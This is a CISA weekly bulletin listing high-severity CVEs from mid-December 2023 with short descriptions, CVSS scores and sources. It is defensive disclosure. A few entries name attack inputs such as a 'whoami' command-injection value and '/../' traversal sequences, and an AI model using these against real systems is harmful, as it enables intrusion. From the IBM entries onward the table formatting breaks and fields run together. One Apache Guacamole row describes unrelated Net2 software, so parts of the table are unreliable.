Vulnerability Summary for the Week of December 18, 2023

Released: Dec 26, 2023
Document ID: SB23-360

The CISA Vulnerability Bulletin provides a summary of new vulnerabilities that have been recorded in the past week. In some cases, the vulnerabilities in the bulletin may not yet have assigned CVSS scores.

Vulnerabilities are based on the Common Vulnerabilities and Exposures (CVE) vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities corresponds to the following scores:

  • High: vulnerabilities with a CVSS base score of 7.0–10.0
  • Medium: vulnerabilities with a CVSS base score of 4.0–6.9
  • Low: vulnerabilities with a CVSS base score of 0.0–3.9

Entries may include additional information provided by organizations and efforts sponsored by CISA. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletin is compiled from external, open-source reports and is not a direct result of CISA analysis. 


 High Vulnerabilities

| Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info |
|---|---|---|---|---|
| 52north -- 52north_wps | An XXE (XML External Entity) vulnerability has been detected in 52North WPS affecting versions prior to 4.0.0-beta.11. This vulnerability allows the use of external entities in its WebProcessingService servlet for an attacker to retrieve files by making HTTP requests to the internal network. | 2023-12-19 | 7.2 | CVE-2023-6280; cve-coordination@incibe.es |
| aditaas -- allied_digital_integrated_tool-as-a-service | The vulnerability exists in ADiTaaS (Allied Digital Integrated Tool-as-a-Service) version 5.1 due to an improper authentication vulnerability in the ADiTaaS backend API. An unauthenticated remote attacker could exploit this vulnerability by sending specially crafted HTTP requests to the vulnerable platform. Successful exploitation of this vulnerability could allow the attacker to gain full access to the customers' data and completely compromise the targeted platform. | 2023-12-18 | 9.8 | CVE-2023-6483; vdisclose@cert-in.org.in |
| apache -- doris | The api /api/snapshot and /api/get_log_file would allow unauthenticated access. It could allow a DoS attack or get arbitrary files from FE node. Please upgrade to 2.0.3 to fix these issues. | 2023-12-18 | 8.2 | CVE-2023-41314; security@apache.org |
| apache -- dubbo | A deserialization vulnerability existed when decoding a malicious package. This issue affects Apache Dubbo: from 3.1.0 through 3.1.10, from 3.2.0 through 3.2.4. Users are recommended to upgrade to the latest version, which fixes the issue. | 2023-12-15 | 9.8 | CVE-2023-29234; security@apache.org |
| apache -- dubbo | Deserialization of Untrusted Data vulnerability in Apache Dubbo. This issue only affects Apache Dubbo 3.1.5. Users are recommended to upgrade to the latest version, which fixes the issue. | 2023-12-15 | 9.8 | CVE-2023-46279; security@apache.org |
| apache -- guacamole | Apache Guacamole 1.5.3 and older do not consistently ensure that values received from a VNC server will not result in integer overflow. If a user connects to a malicious or compromised VNC server, specially-crafted data could result in memory corruption, possibly allowing arbitrary code to be executed with the privileges of the running guacd process. Users are recommended to upgrade to version 1.5.4, which fixes this issue. | 2023-12-19 | 8.8 | CVE-2023-43826; security@apache.org |
| apache -- guacamole | When installing the Net2 software a root certificate is installed into the trusted store. A potential hacker could access the installer batch file or reverse engineer the source code to gain access to the root certificate password. Using the root certificate and password they could then create their own certificates to emulate another site. Then by establishing a proxy service to emulate the site they could monitor traffic passed between the end user and the site allowing access to the data content. | 2023-12-19 | 8.1 | CVE-2023-43870; cert@ncsc.nl |
| apache -- pulsar | Improper Authentication vulnerability in Apache Pulsar WebSocket Proxy allows an attacker to connect to the /pingpong endpoint without authentication. This issue affects Apache Pulsar WebSocket Proxy: from 2.8.0 through 2.8.*, from 2.9.0 through 2.9.*, from 2.10.0 through 2.10.4, from 2.11.0 through 2.11.1, 3.0.0. The known risks include a denial of service due to the WebSocket Proxy accepting any connections, and excessive data transfer due to misuse of the WebSocket ping/pong feature. 2.10 Pulsar WebSocket Proxy users should upgrade to at least 2.10.5. 2.11 Pulsar WebSocket Proxy users should upgrade to at least 2.11.2. 3.0 Pulsar WebSocket Proxy users should upgrade to at least 3.0.1. 3.1 Pulsar WebSocket Proxy users are unaffected. Any users running the Pulsar WebSocket Proxy for 2.8, 2.9, and earlier should upgrade to one of the above patched versions. | 2023-12-20 | 7.5 | CVE-2023-37544; security@apache.org |
| apache -- superset | An authenticated Gamma user has the ability to create a dashboard and add charts to it, this user would automatically become one of the owners of the charts allowing him to incorrectly have write permissions to these charts. This issue affects Apache Superset: before 2.1.2, from 3.0.0 before 3.0.2. Users are recommended to upgrade to version 3.0.2 or 2.1.3, which fixes the issue. | 2023-12-19 | 7.7 | CVE-2023-49734; security@apache.org |
| armorxgt -- spamtrap | ArmorX Global Technology Corporation ArmorX Spam has insufficient validation for user input within a special function. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands to access, modify and delete database. | 2023-12-15 | 9.8 | CVE-2023-48384; twcert@cert.org.tw |
| aveva -- edge | An issue was discovered in ExecuteCommand() in AVEVA Edge (formerly InduSoft Web Studio) versions R2020 and prior that allows unauthenticated arbitrary commands to be executed. | 2023-12-16 | 9.8 | CVE-2021-42796; cve@mitre.org |
| aveva -- edge | Path traversal vulnerability in AVEVA Edge (formerly InduSoft Web Studio) versions R2020 and prior allows an unauthenticated user to steal the Windows access token of the user account configured for accessing external DB resources. | 2023-12-16 | 7.5 | CVE-2021-42797; cve@mitre.org |
| awslabs -- sandbox-accounts-for-events | "Sandbox Accounts for Events" provides multiple, temporary AWS accounts to a number of authenticated users simultaneously via a browser-based GUI. Authenticated users could potentially claim and access empty AWS accounts by sending request payloads to the account API containing non-existent event ids and self-defined budget & duration. This issue only affects cleaned AWS accounts, it is not possible to access AWS accounts in use or existing data/infrastructure. This issue has been patched in version 1.1.0. | 2023-12-22 | 7.1 | CVE-2023-50928; security-advisories@github.com |
| awslabs -- sandbox-accounts-for-events | Sandbox Accounts for Events provides multiple, temporary AWS accounts to a number of authenticated users simultaneously via a browser-based GUI. Authenticated users could potentially read data from the events table by sending request payloads to the events API, collecting information on planned events, timeframes, budgets and owner email addresses. This data access may allow users to get insights into upcoming events and join events which they have not been invited to. This issue has been patched in version 1.10.0. | 2023-12-22 | 7.8 | CVE-2023-51386; security-advisories@github.com |
| backupbliss -- backup_migration | The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated attackers to easily execute code on the server. | 2023-12-15 | 9.8 | CVE-2023-6553; security@wordfence.com |
| bazarr -- bazarr | Bazarr manages and downloads subtitles. Prior to 1.3.1, Bazarr contains an arbitrary file read in /system/backup/download/ endpoint in bazarr/app/ui.py does not validate the user-controlled filename variable and uses it in the send_file function, which leads to an arbitrary file read on the system. This issue is fixed in version 1.3.1. | 2023-12-15 | 7.5 | CVE-2023-50264; security-advisories@github.com |
| bazarr -- bazarr | Bazarr manages and downloads subtitles. Prior to 1.3.1, the /api/swaggerui/static endpoint in bazarr/app/ui.py does not validate the user-controlled filename variable and uses it in the send_file function, which leads to an arbitrary file read on the system. This issue is fixed in version 1.3.1. | 2023-12-15 | 7.5 | CVE-2023-50265; security-advisories@github.com |
| bosch -- cpp13_firmware | A command injection vulnerability exists in Bosch IP cameras that allows an authenticated user with administrative rights to run arbitrary commands on the OS of the camera. | 2023-12-18 | 7.2 | CVE-2023-39509; psirt@bosch.com |
| bosch -- monitor_wall | An improper handling of a malformed API request to an API server in Bosch BT software products can allow an unauthenticated attacker to cause a Denial of Service (DoS) situation. | 2023-12-18 | 7.5 | CVE-2023-32230; psirt@bosch.com |
| cacti -- cacti | Cacti is a robust performance and fault management framework and a frontend to RRDTool - a Time Series Database (TSDB). While using the detected SQL Injection and insufficient processing of the include file path, it is possible to execute arbitrary code on the server. Exploitation of the vulnerability is possible for an authorized user. The vulnerable component is the `link.php`. Impact of the vulnerability: execution of arbitrary code on the server. | 2023-12-21 | 8 | CVE-2023-49084; security-advisories@github.com |
| cacti -- cacti | Cacti provides an operational monitoring and fault management framework. In versions 1.2.25 and prior, it is possible to execute arbitrary SQL code through the `pollers.php` script. An authorized user may be able to execute arbitrary SQL code. The vulnerable component is the `pollers.php`. Impact of the vulnerability - arbitrary SQL code execution. As of time of publication, a patch does not appear to exist. | 2023-12-22 | 8.8 | CVE-2023-49085; security-advisories@github.com |
| cacti -- cacti | Cacti provides an operational monitoring and fault management framework. Version 1.2.25 has a Blind SQL Injection (SQLi) vulnerability within the SNMP Notification Receivers feature in the file `'managers.php'`. An authenticated attacker with the "Settings/Utilities" permission can send a crafted HTTP GET request to the endpoint `'/cacti/managers.php'` with an SQLi payload in the `'selected_graphs_array'` HTTP GET parameter. As of time of publication, no patched versions exist. | 2023-12-22 | 8.8 | CVE-2023-51448; security-advisories@github.com |
| cambium_ -- epmp_force_300-25 | Cambium ePMP Force 300-25 version 4.7.0.1 is vulnerable to a code injection vulnerability that could allow an attacker to perform remote code execution and gain root privileges. | 2023-12-18 | 7.8 | CVE-2023-6691; ics-cert@hq.dhs.gov |
| clickhouse -- clickhouse | ClickHouse® is an open-source column-oriented database management system that allows generating analytical data reports in real-time. A heap buffer overflow issue was discovered in ClickHouse server. An attacker could send a specially crafted payload to the native interface exposed by default on port 9000/tcp, triggering a bug in the decompression logic of T64 codec that crashes the ClickHouse server process. This attack does not require authentication. Note that this exploit can also be triggered via HTTP protocol, however, the attacker will need a valid credential as the HTTP authentication takes place first. This issue has been fixed in version 23.10.2.13-stable, 23.9.4.11-stable, 23.8.6.16-lts and 23.3.16.7-lts. | 2023-12-20 | 7 | CVE-2023-47118; security-advisories@github.com |
| clickhouse -- clickhouse | ClickHouse is an open-source column-oriented database management system that allows generating analytical data reports in real-time. A heap buffer overflow issue was discovered in ClickHouse server. An attacker could send a specially crafted payload to the native interface exposed by default on port 9000/tcp, triggering a bug in the decompression logic of Gorilla codec that crashes the ClickHouse server process. This attack does not require authentication. This issue has been addressed in ClickHouse Cloud version 23.9.2.47551 and ClickHouse versions 23.10.5.20, 23.3.18.15, 23.8.8.20, and 23.9.6.20. | 2023-12-22 | 7 | CVE-2023-48704; security-advisories@github.com |
| codelyfe -- stupid_simple_cms | A vulnerability, which was classified as critical, was found in codelyfe Stupid Simple CMS up to 1.2.3. This affects an unknown part of the file /terminal/handle-command.php of the component HTTP POST Request Handler. The manipulation of the argument command with the input whoami leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248259. | 2023-12-17 | 9.8 | CVE-2023-6901; cna@vuldb.com |
| codelyfe -- stupid_simple_cms | A vulnerability has been found in codelyfe Stupid Simple CMS up to 1.2.4 and classified as critical. This vulnerability affects unknown code of the file /file-manager/upload.php. The manipulation of the argument file leads to unrestricted upload. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248260. | 2023-12-17 | 9.8 | CVE-2023-6902; cna@vuldb.com |
| codelyfe -- stupid_simple_cms | A vulnerability has been found in codelyfe Stupid Simple CMS up to 1.2.4 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /file-manager/delete.php of the component Deletion Interface. The manipulation of the argument file leads to improper authentication. The exploit has been disclosed to the public and may be used. The identifier VDB-248269 was assigned to this vulnerability. | 2023-12-18 | 9.1 | CVE-2023-6907; cna@vuldb.com |
| csharp -- cws_collaborative_development_platform | SmartStar Software CWS is a web-based integration platform, its file uploading function does not restrict upload of file with dangerous type. An unauthenticated remote attacker can exploit this vulnerability to upload arbitrary files to perform arbitrary command or disrupt service. | 2023-12-15 | 9.8 | CVE-2023-48376; twcert@cert.org.tw |
| csharp -- cws_collaborative_development_platform | SmartStar Software CWS is a web-based integration platform, it has a vulnerability of missing authorization and users are able to access data or perform actions that they should not be allowed to perform via commands. An authenticated user with normal user privilege can execute administrator privilege, resulting in performing arbitrary system operations or disrupting service. | 2023-12-15 | 8.8 | CVE-2023-48375; twcert@cert.org.tw |
| cybrosys -- website_blog_search | A SQL injection vulnerability in Cybrosys Techno Solutions Website Blog Search (aka website_search_blog) v. 13.0 through 13.0.1.0.1 allows a remote attacker to execute arbitrary code and to gain privileges via the name parameter in controllers/main.py component. | 2023-12-15 | 9.8 | CVE-2023-48049; cve@mitre.org |
| dell -- cpg_bios | Dell Client BIOS contains a pre-boot direct memory access (DMA) vulnerability. An authenticated attacker with physical access to the system may potentially exploit this vulnerability in order to execute arbitrary code on the device. | 2023-12-22 | 7.2 | CVE-2023-43088; security_alert@emc.com |
| dell -- supportassist_client_consumer | Dell SupportAssist for Home PCs version 3.14.1 and prior versions contain a privilege escalation vulnerability in the installer. A local low privileged authenticated attacker may potentially exploit this vulnerability, leading to the execution of arbitrary executable on the operating system with elevated privileges. | 2023-12-22 | 7.3 | CVE-2023-48670; security_alert@emc.com |
| dlink -- dir-850l_firmware | An issue in D-Link DIR-850L v.B1_FW223WWb01 allows a remote attacker to execute arbitrary code via a crafted script to the en parameter. | 2023-12-19 | 9.8 | CVE-2023-49004; cve@mitre.org |
| dromara_hertzbeat -- dromara_hertzbeat | Hertzbeat is an open source, real-time monitoring system. Hertzbeat uses aviatorscript to evaluate alert expressions. The alert expressions are supposed to be some simple expressions. However, due to improper sanitization for alert expressions in version prior to 1.4.1, a malicious user can use a crafted alert expression to execute any command on hertzbeat server. A malicious user who has access to alert define function can execute any command in hertzbeat instance. This issue is fixed in version 1.4.1. | 2023-12-22 | 7.2 | CVE-2023-51387; security-advisories@github.com |
| dromara_hertzbeat -- dromara_hertzbeat | Hertzbeat is an open source, real-time monitoring system. Prior to version 1.4.1, Spring Boot permission configuration issues caused unauthorized access vulnerabilities to three interfaces. This could result in disclosure of sensitive server information. Version 1.4.1 fixes this issue. | 2023-12-22 | 7.5 | CVE-2023-51650; security-advisories@github.com |
| dromara_hertzbeat -- dromara_hertzbeat | Hertzbeat is an open source, real-time monitoring system with custom-monitoring, high performance cluster, prometheus-like and agentless. Hertzbeat versions 1.20 and prior have a permission bypass vulnerability. System authentication can be bypassed and invoke interfaces without authorization. Version 1.2.1 contains a patch for this issue. | 2023-12-22 | 7.5 | CVE-2022-39337; security-advisories@github.com |
| efacec -- bcu_500 | Through the exploitation of active user sessions, an attacker could send custom requests to cause a denial-of-service condition on the device. | 2023-12-20 | 9.6 | CVE-2023-50707; ics-cert@hq.dhs.gov |
| efacec -- bcu_500 | A successful CSRF attack could force the user to perform state changing requests on the application. If the victim is an administrative account, a CSRF attack could compromise the entire web application. | 2023-12-20 | 8.2 | CVE-2023-6689; ics-cert@hq.dhs.gov |
| engelsystem -- engelsystem | Engelsystem is a shift planning system for chaos events. Engelsystem prior to v3.4.1 performed insufficient validation of user supplied data for the DECT number, mobile number, and work-log comment fields. The values of those fields would be displayed in corresponding log overviews, allowing the injection and execution of Javascript code in another user's context. This vulnerability enables an authenticated user to inject Javascript into other users' sessions. The injected JS will be executed during normal usage of the system when viewing, e.g., overview pages. This issue has been fixed in version 3.4.1. | 2023-12-22 | 7.3 | CVE-2023-50924; security-advisories@github.com |
| eset,_spol._s_r.o. -- eset_nod32_antivirus | Improper validation of the server's certificate chain in secure traffic scanning feature considered intermediate certificate signed using the MD5 or SHA1 algorithm as trusted. | 2023-12-21 | 7.5 | CVE-2023-5594; security@eset.com |
| eurotel -- etl3100 | EuroTel ETL3100 versions v01c01 and v01x37 do not limit the number of attempts to guess administrative credentials in remote password attacks to gain full control of the system. | 2023-12-19 | 9.8 | CVE-2023-6928; ics-cert@hq.dhs.gov |
| eurotel -- etl3100 | EuroTel ETL3100 versions v01c01 and v01x37 suffer from an unauthenticated configuration and log download vulnerability. This enables the attacker to disclose sensitive information and assist in authentication bypass, privilege escalation, and full system access. | 2023-12-19 | 9.4 | CVE-2023-6930; ics-cert@hq.dhs.gov |
| eurotel -- etl3100 | EuroTel ETL3100 versions v01c01 and v01x37 are vulnerable to insecure direct object references that occur when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability, attackers can bypass authorization, access the hidden resources on the system, and execute privileged functionalities. | 2023-12-19 | 7.5 | CVE-2023-6929; ics-cert@hq.dhs.gov |
| forestblog -- forestblog | A vulnerability classified as critical has been found in saysky ForestBlog up to 20220630. This affects an unknown part of the file /admin/upload/img of the component Image Upload Handler. The manipulation of the argument filename leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248247. | 2023-12-17 | 9.8 | CVE-2023-6887; cna@vuldb.com |
| gallagher -- controller_6000 | A format string issue in the Controller 6000's optional diagnostic web interface can be used to write/read from memory, and in some instances crash the Controller 6000 leading to a Denial of Service. This issue affects: Gallagher Controller 6000 8.60 prior to vCR8.60.231116a (distributed in 8.60.2550 (MR7)), all versions of 8.50 and prior. | 2023-12-18 | 7.5 | CVE-2023-24590; disclosures@gallagher.com |
| getsentry -- sentry-javascript | Sentry-Javascript is official Sentry SDKs for JavaScript. A ReDoS (Regular expression Denial of Service) vulnerability has been identified in Sentry's Astro SDK 7.78.0-7.86.0. Under certain conditions, this vulnerability allows an attacker to cause excessive computation times on the server, leading to denial of service (DoS). This vulnerability has been patched in sentry/astro version 7.87.0. | 2023-12-20 | 7.5 | CVE-2023-50249; security-advisories@github.com |
| github -- enterprise_server | Improper privilege management in all versions of GitHub Enterprise Server allows users with authorized access to the management console with an editor role to escalate their privileges by making requests to the endpoint used for bootstrapping the instance. This vulnerability affected GitHub Enterprise Server version 3.8.0 and above and was fixed in version 3.8.12, 3.9.6, 3.10.3, and 3.11.0. | 2023-12-21 | 8 | CVE-2023-46647; product-cna@github.com |
| github -- enterprise_server | An insufficient entropy vulnerability was identified in GitHub Enterprise Server (GHES) that allowed an attacker to brute force a user invitation to the GHES Management Console. To exploit this vulnerability, an attacker would need knowledge that a user invitation was pending. This vulnerability affected all versions of GitHub Enterprise Server since 3.8 and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1. This vulnerability was reported via the GitHub Bug Bounty program. | 2023-12-21 | 8.3 | CVE-2023-46648; product-cna@github.com |
| github -- enterprise_server | An insertion of sensitive information into log file vulnerability was identified in the log files for a GitHub Enterprise Server back-end service that could permit an `adversary in the middle attack` when combined with other phishing techniques. To exploit this, an attacker would need access to the log files for the GitHub Enterprise Server appliance, a backup archive created with GitHub Enterprise Server Backup Utilities, or a service which received streamed logs. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.17.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1. | 2023-12-21 | 8.1 | CVE-2023-6746; product-cna@github.com |
| github -- enterprise_server | An insertion of sensitive information into the log file in the audit log in GitHub Enterprise Server was identified that could allow an attacker to gain access to the management console. To exploit this, an attacker would need access to the log files for the GitHub Enterprise Server appliance, a backup archive created with GitHub Enterprise Server Backup Utilities, or a service which received streamed logs. This vulnerability affected all versions of GitHub Enterprise Server since 3.8 and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1. | 2023-12-21 | 7.2 | CVE-2023-6802; product-cna@github.com |
| github -- enterprise_server | An improper authentication vulnerability was identified in GitHub Enterprise Server that allowed a bypass of Private Mode by using a specially crafted API request. To exploit this vulnerability, an attacker would need network access to the Enterprise Server appliance configured in Private Mode. This vulnerability affected all versions of GitHub Enterprise Server since 3.9 and was fixed in version 3.9.7, 3.10.4, and 3.11.1. This vulnerability was reported via the GitHub Bug Bounty program. | 2023-12-21 | 7.5 | CVE-2023-6847; product-cna@github.com |
| gitlab -- gitlab | A privilege escalation vulnerability in GitLab EE affecting all versions from 16.0 prior to 16.4.4, 16.5 prior to 16.5.4, and 16.6 prior to 16.6.2 allows a project Maintainer to use a Project Access Token to escalate their role to Owner. | 2023-12-17 | 8.8 | CVE-2023-3907; cve@gitlab.com |
| gitlab -- gitlab | An improper certificate validation issue in Smartcard authentication in GitLab EE affecting all versions from 11.6 prior to 16.4.4, 16.5 prior to 16.5.4, and 16.6 prior to 16.6.2 allows an attacker to authenticate as another user given their public key if they use Smartcard authentication. Smartcard authentication is an experimental feature and has to be manually enabled by an administrator. | 2023-12-15 | 8.1 | CVE-2023-6680; cve@gitlab.com |
| gitlab -- gitlab | An issue has been discovered in GitLab EE affecting all versions starting before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. It was possible to overflow the time spent on an issue that altered the details shown in the issue boards. | 2023-12-15 | 7.5 | CVE-2023-3904; cve@gitlab.com |
| gmarczynski -- dynamic_progress_bar | A SQL injection vulnerability in Grzegorz Marczynski Dynamic Progress Bar (aka web_progress) v. 11.0 through 11.0.2, v12.0 through v12.0.2, v.13.0 through v13.0.2, v.14.0 through v14.0.2.1, v.15.0 through v15.0.2, and v16.0 through v16.0.2.1 allows a remote attacker to gain privileges via the recency parameter in models/web_progress.py component. | 2023-12-15 | 9.8 | CVE-2023-40954; cve@mitre.org |
| grackle -- grackle | Grackle is a GraphQL server written in functional Scala, built on the Typelevel stack. The GraphQL specification requires that GraphQL fragments must not form cycles, either directly or indirectly. Prior to Grackle version 0.18.0, that requirement wasn't checked, and queries with cyclic fragments would have been accepted for type checking and compilation. The attempted compilation of such fragments would result in a JVM `StackOverflowError` being thrown. Some knowledge of an application's GraphQL schema would be required to construct such a query, however no knowledge of any application-specific performance or other behavioral characteristics would be needed. Grackle uses the cats-parse library for parsing GraphQL queries. Prior to version 0.18.0, Grackle made use of the cats-parse `recursive` operator. However, `recursive` is not currently stack safe. `recursive` was used in three places in the parser: nested selection sets, nested input values (lists and objects), and nested list type declarations. Consequently, queries with deeply nested selection sets, input values or list types could be constructed which exploited this, causing a JVM `StackOverflowException` to be thrown during parsing. Because this happens very early in query processing, no specific knowledge of an application's GraphQL schema would be required to construct such a query. The possibility of small queries resulting in stack overflow is a potential denial of service vulnerability. This potentially affects all applications using Grackle which have untrusted users. Both stack overflow issues have been resolved in the v0.18.0 release of Grackle. As a workaround, users could interpose a sanitizing layer in between untrusted input and Grackle query processing. | 2023-12-22 | 7.5 | CVE-2023-50730; security-advisories@github.com |
| hcl_software -- hcl_bigfix_platform | Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability. This XSS vulnerability is in the Download Status Report, which is served by the BigFix Server. | 2023-12-21 | 7.7 | CVE-2023-37519; psirt@hcl.com |
| hcl_software -- hcl_bigfix_platform | Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability identified in BigFix Server version 9.5.12.68, allowing for potential data exfiltration. This XSS vulnerability is in the Gather Status Report, which is served by the BigFix Relay. | 2023-12-21 | 7.7 | CVE-2023-37520; psirt@hcl.com |
| hewlett_packard_enterprise -- multiple_products | A potential security vulnerability has been identified in HPE Integrated Lights-Out 5 (iLO 5) and Integrated Lights-Out 6 (iLO 6). The vulnerability could be remotely exploited to allow authentication bypass. | 2023-12-19 | 7.5 | CVE-2023-50272; security-alert@hpe.com |
| hikvision -- intercom_broadcast_system | A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK) and classified as problematic. Affected by this issue is some unknown functionality of the file /php/exportrecord.php. The manipulation of the argument downname with the input C:\ICPAS\Wnmp\WWW\php\conversion.php leads to path traversal. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248252. | 2023-12-17 | 7.5 | CVE-2023-6893; cna@vuldb.com |
| hitachi_energy -- rtu500_scripting_interface | A vulnerability exists in the component RTU500 Scripting interface. When a client connects to a server using TLS, the server presents a certificate. This certificate links a public key to the identity of the service and is signed by a Certification Authority (CA), allowing the client to validate that the remote service can be trusted and is not malicious. If the client does not validate the parameters of the certificate, then attackers could be able to spoof the identity of the service. An attacker could exploit the vulnerability by faking the identity of a RTU500 device and intercepting the messages initiated via the RTU500 Scripting interface. | 2023-12-19 | 7.4 | CVE-2023-1514; cybersecurity@hitachienergy.com |
| hp -- system_management_homepage | A potential security vulnerability has been identified with HP-UX System Management Homepage (SMH). This vulnerability could be exploited locally or remotely to disclose information. | 2023-12-17 | 7.5 | CVE-2023-50271; security-alert@hpe.com |
| ibm -- mq_appliance | IBM MQ Appliance 9.3 LTS and 9.3 CD could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request to view arbitrary files on the system. IBM X-Force ID: 269536. | 2023-12-18 | 7.5 | CVE-2023-46177; psirt@us.ibm.com |
ibm -- planning_analyticsIBM Planning Analytics Local 2.0 could allow a remote attacker to upload arbitrary files, caused by the improper validation of file extensions. By sending a specially crafted HTTP request, a remote attacker could exploit this vulnerability to upload a malicious script, which could allow the attacker to execute arbitrary code on the vulnerable system. IBM X-Force ID: 265567.2023-12-228CVE-2023-42017
psirt@us.ibm.com
ibm -- security_guardium_key_lifecycle_managerIBM Security Guardium Key Lifecycle Manager 4.3 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view modify files on the system. IBM X-Force ID: 271196.2023-12-209.1CVE-2023-47702
psirt@us.ibm.com
ibm -- security_guardium_key_lifecycle_managerIBM Security Guardium Key Lifecycle Manager 4.3 could allow an authenticated user to upload files of a dangerous file type. IBM X-Force ID: 271341.2023-12-208.8CVE-2023-47706
psirt@us.ibm.com
ibm -- security_guardium_key_lifecycle_managerIBM Security Guardium Key Lifecycle Manager 4.3 contains plain text hard-coded credentials or other secrets in source code repository. IBM X-Force ID: 271220.2023-12-207.5CVE-2023-47704
psirt@us.ibm.com
idemia -- sigma_lite_firmwareThe Parameter Zone Read and Parameter Zone Write command handlers allow performing a Stack buffer overflow. This could potentially lead to a Remote Code execution on the targeted device.2023-12-159.8CVE-2023-33218
a87f365f-9d39-4848-9b3a-58c7cae69cab
idemia -- sigma_lite_firmwareThe handler of the retrofit validation command doesn't properly check the boundaries when performing certain validation operations. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device2023-12-159.8CVE-2023-33219
a87f365f-9d39-4848-9b3a-58c7cae69cab
idemia -- sigma_lite_firmwareDuring the retrofit validation process, the firmware doesn't properly check the boundaries while copying some attributes to check. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device2023-12-159.8CVE-2023-33220
a87f365f-9d39-4848-9b3a-58c7cae69cab
idemia -- sigma_lite_firmwareWhen reading DESFire keys, the function that reads the card does not properly check the boundaries when internally copying the received data. This allows a heap-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device. This is especially problematic if you use the default DESFire key.2023-12-159.8CVE-2023-33221
a87f365f-9d39-4848-9b3a-58c7cae69cab
idemia -- sigma_lite_firmwareBy abusing a design flaw in the firmware upgrade mechanism of the impacted terminal, it's possible to cause a permanent denial of service for the terminal. The only way to recover the terminal is by sending it back to the manufacturer.2023-12-157.5CVE-2023-33217
a87f365f-9d39-4848-9b3a-58c7cae69cab
imou -- imou_life_appA session hijacking vulnerability has been detected in the Imou Life application affecting version 6.7.0. This vulnerability could allow an attacker to hijack user accounts due to the QR code functionality not properly filtering codes when scanning a new device and directly running WebView without prompting or displaying it to the user. This vulnerability could trigger phishing attacks.2023-12-198.1CVE-2023-6913
cve-coordination@incibe.es
infinispan -- infinispanA flaw was found in Infinispan. When serializing the configuration for a cache to XML/JSON/YAML, which contains credentials (JDBC store with connection pooling, remote store), the credentials are returned in clear text as part of the configuration.2023-12-187.2CVE-2023-5384
secalert@redhat.com
istanbul_soft_informatics_and_consultancy_limited_company -- softomi_advanced_c2c_marketplace_softwareImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in İstanbul Soft Informatics and Consultancy Limited Company Softomi Advanced C2C Marketplace Software allows SQL Injection. This issue affects Softomi Advanced C2C Marketplace Software: before 12122023.2023-12-219.8CVE-2023-6145
iletisim@usom.gov.tr
itpison -- omicard_edmITPison OMICARD EDM's file uploading function does not restrict upload of file with dangerous type. An unauthenticated remote attacker can exploit this vulnerability to upload and run arbitrary executable files to perform arbitrary system commands or disrupt service.2023-12-159.8CVE-2023-48371
twcert@cert.org.tw
itpison -- omicard_edmITPison OMICARD EDM's SMS-related function has insufficient validation for user input. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands to access, modify and delete database.2023-12-159.8CVE-2023-48372
twcert@cert.org.tw
itpison -- omicard_edmITPison OMICARD EDM has a path traversal vulnerability within its parameter "FileName" in a specific function. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files.2023-12-157.5CVE-2023-48373
twcert@cert.org.tw
ivanti -- avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result in a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-41727
support@hackerone.com
ivanti -- avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result in a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46216
support@hackerone.com
ivanti -- avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result in a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46217
support@hackerone.com
ivanti -- avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result in a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46220
support@hackerone.com
ivanti -- avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result in a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46221
support@hackerone.com
ivanti -- avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result in a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46222
support@hackerone.com
ivanti -- avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result in a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46223
support@hackerone.com
ivanti -- avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result in a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46224
support@hackerone.com
ivanti -- avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result in a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46225
